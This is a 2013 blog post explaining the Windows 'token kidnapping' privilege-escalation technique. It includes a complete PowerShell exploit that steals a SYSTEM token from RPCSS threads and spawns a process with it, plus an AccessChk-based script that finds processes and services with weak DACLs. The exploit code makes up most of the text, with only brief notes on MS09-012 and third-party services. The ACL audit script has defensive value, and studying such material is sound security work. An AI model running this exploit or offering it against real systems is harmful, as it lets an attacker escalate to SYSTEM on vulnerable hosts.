4 Mar 2013

AccessChk - Win Escalate privileges

Cesar Cerrudo, an Argentinian pen-tester who focuses on Windows access control, coined the phrase “token kidnapping” to describe an escalation technique that abuses process and thread ACLs. The steps in the token kidnapping process are outlined here:
1. Start with SeImpersonatePrivilege and NetworkService privileges. The most likely paths to get those privileges are as follows:

- Attacker has permission to place custom ASP pages within an IIS directory running in classic ASP or “full trust” ASP.NET
- Attacker compromises a SQL Server administrative account
- Attacker compromises any Windows service

2. The RPCSS service runs under the NetworkService account, so an attacker running as NetworkService can access the internals of the RPCSS process.
3. Use the OpenThreadToken function to get the security token from one of the RPCSS threads. A thread only carries a token while it is impersonating a caller, so threads that are not impersonating return no token.
4. Iterate through all thread tokens in the RPCSS process to find one running as SYSTEM.
5. Create a new process using the SYSTEM token found in the RPCSS process.
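The five steps above as one worked example in PowerShell. This is an added example, not code from the original post or from Cesar Cerrudo; it assumes a Windows host, a caller that already holds SeImpersonatePrivilege (step 1), and an RPCSS whose thread tokens are still reachable (pre-MS09-012 or an equivalently weak third-party service). On a patched system the OpenThreadToken calls fail with ERROR_ACCESS_DENIED, which is the expected result. The process is created with CreateProcessWithTokenW, one of several ways to do step 5.

```powershell
# Added example, not the original post's code. Token kidnapping via P/Invoke:
# walk the RPCSS threads, pull an impersonation token that belongs to SYSTEM,
# turn it into a primary token and start a process with it.
Add-Type -Namespace Kidnap -Name Native -MemberDefinition @'
[DllImport("kernel32.dll", SetLastError = true)]
public static extern IntPtr OpenThread(uint dwDesiredAccess, bool bInheritHandle, uint dwThreadId);
[DllImport("advapi32.dll", SetLastError = true)]
public static extern bool OpenThreadToken(IntPtr ThreadHandle, uint DesiredAccess, bool OpenAsSelf, out IntPtr TokenHandle);
[DllImport("advapi32.dll", SetLastError = true)]
public static extern bool DuplicateTokenEx(IntPtr hExistingToken, uint dwDesiredAccess, IntPtr lpTokenAttributes, int ImpersonationLevel, int TokenType, out IntPtr phNewToken);
[DllImport("kernel32.dll", SetLastError = true)]
public static extern bool CloseHandle(IntPtr hObject);
[StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
public struct STARTUPINFO { public int cb; public string lpReserved; public string lpDesktop; public string lpTitle; public int dwX; public int dwY; public int dwXSize; public int dwYSize; public int dwXCountChars; public int dwYCountChars; public int dwFillAttribute; public int dwFlags; public short wShowWindow; public short cbReserved2; public IntPtr lpReserved2; public IntPtr hStdInput; public IntPtr hStdOutput; public IntPtr hStdError; }
[StructLayout(LayoutKind.Sequential)]
public struct PROCESS_INFORMATION { public IntPtr hProcess; public IntPtr hThread; public int dwProcessId; public int dwThreadId; }
[DllImport("advapi32.dll", SetLastError = true, CharSet = CharSet.Unicode)]
public static extern bool CreateProcessWithTokenW(IntPtr hToken, uint dwLogonFlags, string lpApplicationName, string lpCommandLine, uint dwCreationFlags, IntPtr lpEnvironment, string lpCurrentDirectory, ref STARTUPINFO lpStartupInfo, out PROCESS_INFORMATION lpProcessInformation);
'@

# Step 1: the technique needs SeImpersonatePrivilege (NetworkService has it).
if (-not (whoami /priv | Select-String 'SeImpersonatePrivilege')) {
    throw 'Caller lacks SeImpersonatePrivilege; token kidnapping does not apply.'
}

# Step 2: locate the RPCSS process (runs as NetworkService on the affected systems).
$rpcssPid = (Get-CimInstance Win32_Service -Filter "Name='RpcSs'").ProcessId
if (-not $rpcssPid) { throw 'RpcSs service not found.' }

$THREAD_QUERY_INFORMATION = 0x0040
# TOKEN_ASSIGN_PRIMARY | TOKEN_DUPLICATE | TOKEN_QUERY: what CreateProcessWithTokenW needs later
$TOKEN_ACCESS = 0x0001 -bor 0x0002 -bor 0x0008
$systemToken = [IntPtr]::Zero

# Steps 3 and 4: open each thread's impersonation token and look for SYSTEM (S-1-5-18).
# Threads that are not impersonating have no token; OpenThreadToken fails with ERROR_NO_TOKEN.
foreach ($t in (Get-Process -Id $rpcssPid).Threads) {
    $hThread = [Kidnap.Native]::OpenThread($THREAD_QUERY_INFORMATION, $false, [uint32]$t.Id)
    if ($hThread -eq [IntPtr]::Zero) { continue }
    $hTok = [IntPtr]::Zero
    # OpenAsSelf=$true: run the access check with our process token, not a token we may be impersonating
    if ([Kidnap.Native]::OpenThreadToken($hThread, $TOKEN_ACCESS, $true, [ref]$hTok)) {
        $owner = (New-Object System.Security.Principal.WindowsIdentity($hTok)).User.Value
        Write-Host ("thread {0}: token user {1}" -f $t.Id, $owner)
        if ($owner -eq 'S-1-5-18') { $systemToken = $hTok } else { [void][Kidnap.Native]::CloseHandle($hTok) }
    }
    [void][Kidnap.Native]::CloseHandle($hThread)
    if ($systemToken -ne [IntPtr]::Zero) { break }
}
if ($systemToken -eq [IntPtr]::Zero) {
    throw 'No SYSTEM token reachable: service isolation in place, or no SYSTEM caller is being impersonated right now.'
}

# Step 5: an impersonation token cannot start a process directly; duplicate it into a
# primary token (SecurityImpersonation = 2, TokenPrimary = 1, desired access 0 = same as source).
$hPrimary = [IntPtr]::Zero
if (-not [Kidnap.Native]::DuplicateTokenEx($systemToken, 0, [IntPtr]::Zero, 2, 1, [ref]$hPrimary)) {
    throw ('DuplicateTokenEx failed: ' + [Runtime.InteropServices.Marshal]::GetLastWin32Error())
}
$si = New-Object Kidnap.Native+STARTUPINFO
$si.cb = [Runtime.InteropServices.Marshal]::SizeOf($si)
$pi = New-Object Kidnap.Native+PROCESS_INFORMATION
# Command line is a placeholder for the demonstration; it writes the new process's identity to a file.
$cmd = 'cmd.exe /c whoami > C:\Windows\Temp\kidnap.txt'
if (-not [Kidnap.Native]::CreateProcessWithTokenW($hPrimary, 0, $null, $cmd, 0, [IntPtr]::Zero, $null, [ref]$si, [ref]$pi)) {
    throw ('CreateProcessWithTokenW failed: ' + [Runtime.InteropServices.Marshal]::GetLastWin32Error())
}
Write-Host "spawned pid $($pi.dwProcessId) using the SYSTEM token taken from RPCSS"
```

The two checks that decide whether a given service is exploitable this way are both visible in the output: whether OpenThreadToken succeeds against another service's threads at all (the thread and token DACLs), and whether any of those tokens belongs to a more privileged caller than the service itself.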
Microsoft addressed this specific escalation path with MS09-012. However, other similar escalation paths may exist in third-party services.
Cesar’s excellent “Practical 10 Minutes Security Audit: Oracle Case” guide has other examples of process ACL abuse, one being a NULL DACL on an Oracle process that allows code injection.
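To hunt for the similar escalation paths in third-party services mentioned above, and for the kind of NULL or over-permissive process DACL the Oracle case illustrates, Sysinternals AccessChk can be pointed at every process and service and filtered to the rights that matter. This is an added example and not part of the original post; it assumes accesschk.exe is on the PATH and that its verbose output keeps its layout of an unindented object line followed by indented principal and right lines.

```powershell
# Added example, not the original post's code: find processes and services whose
# DACL grants a low-privileged principal rights that lead to code execution.
param([string]$Principal = 'Authenticated Users')

# Rights that give control of the target (inject, reconfigure, rewrite the DACL), not merely read it.
$Dangerous = @('PROCESS_ALL_ACCESS', 'PROCESS_VM_WRITE', 'PROCESS_CREATE_THREAD',
               'SERVICE_ALL_ACCESS', 'SERVICE_CHANGE_CONFIG', 'WRITE_DAC', 'WRITE_OWNER')

function Find-WeakAcl {
    param([string]$Kind, [string]$Principal)
    # -accepteula: no EULA prompt; -u: suppress errors; -w: only objects the principal can write to;
    # -q: no banner; -v: print the individual access rights.  $Kind is -p (processes) or -c (services).
    $lines = & accesschk.exe -accepteula -uwqv $Kind $Principal '*' 2>$null
    $current = $null
    foreach ($line in $lines) {
        # Object lines ("[pid] image.exe" or a service name) start at column 0; everything else is indented.
        if ($line -notmatch '^\s') { $current = $line.Trim(); continue }
        $right = $line.Trim()
        if ($Dangerous -contains $right) {
            [pscustomobject]@{ Kind = $Kind; Object = $current; Principal = $Principal; Right = $right }
        }
    }
}

$hits = @(Find-WeakAcl -Kind '-p' -Principal $Principal) + @(Find-WeakAcl -Kind '-c' -Principal $Principal)
if ($hits.Count -eq 0) {
    "No process or service grants '$Principal' a dangerous right."
} else {
    $hits | Sort-Object Kind, Object | Format-Table -AutoSize
}
```

Run it once as Everyone (a NULL DACL shows up there), once as Authenticated Users and once as the service account you actually hold, such as NT AUTHORITY\NETWORK SERVICE. A process that grants PROCESS_VM_WRITE or PROCESS_CREATE_THREAD to any of them is a code-injection target; a service that grants SERVICE_CHANGE_CONFIG can have its binary path repointed.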

